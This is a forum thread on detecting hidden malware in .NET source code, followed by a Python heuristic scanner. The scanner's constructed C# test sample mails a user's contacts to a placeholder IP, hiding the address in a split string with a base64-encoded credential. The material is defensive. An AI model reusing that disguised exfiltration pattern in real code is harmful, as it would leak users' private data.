How to Detect Malware Implementation in .Net Code


Question


Hello,

I have been given the source code of a large tailor-made .Net Windows application and I'm required to scan through it and certify that it is safe and malware-free. Are there any tools out there that actually scan .Net source code to detect possible embedded/hidden malware code?

A logical strategy may be to look for code that sends sensitive data outside the application (such as by email, WCF, web services, etc.), correct? If not, what else should I look for?

Any advice would be greatly appreciated...

Regards,

Ziad.

Recommended answers

Strictly speaking, it is not possible in principle. To illustrate that, one contradictory example is enough, right?

The example about sending out sensitive information is very good. This criterion is not enough, but if such data is sent out, this is a problem. Suppose this situation is detected. There are non-malicious applications designed to send such information; for example, error information is sent (hopefully based on the customer's consent) to the company for the purposes of support and bug fixing (the ugly truth is, customers are unable to describe what they see; instead they would rather tell what they think they see, which is usually not true). So the detector of malicious activity will detect a legitimate program as malicious.

Should an attempt to delete a file be considered malicious? Apparently not, because we should be able to implement file commanders.

One can say, let's demand that a non-malicious operation is only allowed on the user's consent. The problem is: it is theoretically impossible to calculate based on the algorithm review. Why? There is a fundamental result of computer science (computability theory, http://en.wikipedia.org/wiki/Computability_theory): it is impossible in general to predict what a Turing-complete program will do over an arbitrarily long time. Likewise, a program may contain code for the user's consent, but how to compute that the program will ever reach this fragment of code? The detector is bound to produce false positives and false negatives.

At the same time, it may be not completely hopeless. In real life a detector would be useful if it could classify all programs into certainly malicious, certainly non-malicious and uncertain.

The biggest problem is the definition of what to consider malicious -- I'm pretty skeptical about such a prospect.


This is a great question. And I can say, there is a huge gap in tools that assist, support or (semi-)automate security reviews (especially of smartphone apps).

I dream of a tool that is able to categorize, group and rank commands, functions and literals by danger, maybe by using some ontology and natural language processing, with a plugin system and a community-driven heuristic AI and such...

In fact, we have all that by now.

There are ontology frameworks and NLP processor projects for the English language out there. On Android, the well-known security suites watch out for "spy functions" of apps like "read contacts, send messages" permissions etc. and at least warn you. Furthermore, there are WordPress plugins that scan the source for "evil" eval() and other known harmful functions. We have static code analysis for, e.g., proper escaping. Take that further, and you will get checks for missing input sanitization. We could create a database with hash sums (instead of just publishing them on a project website) of known libraries to ensure they have not been compromised (e.g. gather the md4 and sha1 hash files from GitHub, or use hashes generated by the versioning system). Check for up-to-date dependencies (every package system does that) to ensure all security holes are closed (like Secunia does).

For a first step, I would take an abstract syntax tree parser (AST), either for C#, VB or, even better, for the intermediate language, gather all function names, and list all unique string literals in a human-readable manner. This output can now be easily analysed for "http" or other keywords that indicate a connection string to leak data. In the next step this has to be atomized and checked against a library. The next step is to put a "risk ranking" on each buzzword in the database. Then we would implement regex matching to search for patterns like IPv4 and IPv6 addresses, etc.

Maybe we end up looking into obfuscated code, like base64-encoded connection strings (a common method for hiding Trojans in PHP and JS code) or backdoor passwords. But even this is not new and therefore doable - see JS beautifier, which has a detect-obfuscator capability, as most disassemblers also have.

By analysing code that was already optimized by a precompile step (assuming it does concatenation) we may easily discover split strings like 'ht'+'tp'.

It should even be possible to "teach" a heuristic algorithm that a function like "saveToDisk" needs at least write permissions for local storage, which is indicated by the words "save" and "disk". Any other use of a function or external library should be reported.

The heuristic search could be trained with well-reviewed and trusted code, just like a virus/malware scanner. In fact such a tool would be nothing more than a virus scanner on a higher abstraction level (e.g. IL or C# code).

Another feature of a real security audit tool would be a long-term behaviour analysis of a program run in a sandbox where all network traffic and all file access is logged, so we know if the program "reads our contacts" or "sends data to 3rd-party servers" etc.

As we can see, this is all a question of time, money and expertise.
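The first steps sketched in the answer above (list every string literal, fold split strings like 'ht'+'tp', look for "http", IP addresses and base64 blobs, and put a risk ranking on risky API names) can be done in a few dozen lines. The script below is an added example for this thread, not a tool from either answer or from any real product. It uses a regex tokenizer instead of a real AST (a Roslyn syntax walker is the robust way for a production review); the API weights, the pattern list and the sample C# file are constructed for the example and are not an authoritative list of malicious indicators.

```python
import base64
import binascii
import re

# Risk weights for .NET APIs worth a second look (constructed for this example).
API_RISK = {
    "SmtpClient": 4, "MailMessage": 3, "WebClient": 3, "HttpClient": 3,
    "HttpWebRequest": 3, "TcpClient": 3, "Socket": 2, "Process.Start": 4,
    "Assembly.Load": 4, "DllImport": 2, "Registry.SetValue": 2,
    "File.Delete": 1, "Convert.FromBase64String": 3,
}
API_RE = re.compile(r"(?<!\w)(?:%s)(?!\w)" % "|".join(
    re.escape(k) for k in sorted(API_RISK, key=len, reverse=True)))
# Regular "..." literal with escapes, or verbatim @"..." literal with "" escapes.
# A tokenizer shortcut, not a parser: a quote inside a comment or a char
# literal like '"' can confuse it; use a Roslyn syntax walker for real reviews.
STRING_RE = re.compile(r'@"(?:[^"]|"")*"|"(?:[^"\\\n]|\\.)*"')
URL_RE = re.compile(r"\b(?:https?|ftp|smtp)://\S+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{12,}={0,2}$")
_ESC = {"n": "\n", "t": "\t", "r": "\r", "0": "\0"}


def _unescape(body):
    """Decode the common escapes of a regular C# string literal."""
    def repl(m):
        esc = m.group(1)
        return chr(int(esc[1:], 16)) if len(esc) == 5 else _ESC.get(esc, esc)
    return re.sub(r"\\(u[0-9a-fA-F]{4}|.)", repl, body)


def extract_literals(source):
    """[(line, value)] for every string literal; literals joined only by '+'
    are folded, so "ht" + "tp" comes back as one literal "http"."""
    out, pending, last_end = [], None, 0
    for m in STRING_RE.finditer(source):
        raw = m.group(0)
        value = raw[2:-1].replace('""', '"') if raw[0] == "@" else _unescape(raw[1:-1])
        line = source.count("\n", 0, m.start()) + 1
        if pending and re.fullmatch(r"\s*\+\s*", source[last_end:m.start()]):
            pending = (pending[0], pending[1] + value)  # concatenation: fold
        else:
            if pending:
                out.append(pending)
            pending = (line, value)
        last_end = m.end()
    if pending:
        out.append(pending)
    return out


def try_base64(value):
    """Decode value if it is a plausible base64 blob of printable text, else None."""
    if len(value) % 4 or not BASE64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify_literal(value):
    """Score one literal and say why; base64 content is decoded and re-scored."""
    score, tags = 0, []
    for tag, rx, weight in (("url", URL_RE, 3), ("ipv4", IPV4_RE, 3), ("email", EMAIL_RE, 2)):
        if rx.search(value):
            score, tags = score + weight, tags + [tag]
    decoded = try_base64(value)
    if decoded is not None:
        inner, inner_tags = classify_literal(decoded)
        score, tags = score + 2 + inner, tags + ["base64->%r" % decoded] + inner_tags
    return score, tags


def scan_source(source):
    """Rank literal and API findings, highest risk first."""
    findings = []
    for line, value in extract_literals(source):
        score, tags = classify_literal(value)
        if score:
            findings.append({"line": line, "kind": "literal", "evidence": value,
                             "tags": tags, "score": score})
    for m in API_RE.finditer(source):
        findings.append({"line": source.count("\n", 0, m.start()) + 1, "kind": "api",
                         "evidence": m.group(0), "tags": [], "score": API_RISK[m.group(0)]})
    return sorted(findings, key=lambda f: (-f["score"], f["line"]))


# Constructed sample, not a real application: a crash reporter that also mails
# the user's contacts to a hard-coded host hidden behind a split string, with a
# base64-encoded credential.
SAMPLE_CS = '''\
class Telemetry
{
    const string Endpoint = "https://telemetry.example.com/report";
    static void Upload(string body) { new WebClient().UploadString(Endpoint, body); }

    static void Hidden(string contacts)
    {
        string host = "ht" + "tp://" + "198.51.100.23/c";
        string key = Encoding.UTF8.GetString(Convert.FromBase64String("cGFzc3dvcmQxMjM="));
        new SmtpClient("smtp.example.net").Send(
            new MailMessage("bot@example.net", "drop@example.org", key, contacts + host));
    }
}
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_CS):
        print(f["score"], f["line"], f["kind"], f["evidence"], f["tags"])
```

Run on the sample, the folded `http://198.51.100.23/c` literal on line 8 ranks first (URL plus hard-coded IPv4), `SmtpClient` next, and the base64 literal is reported together with its decoded text, which is exactly the kind of line a human reviewer then reads in context. The ranking is only a triage order: as the first answer points out, a legitimate crash reporter and an exfiltration routine look the same at this level, so the tool narrows the reading list rather than certifying anything.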

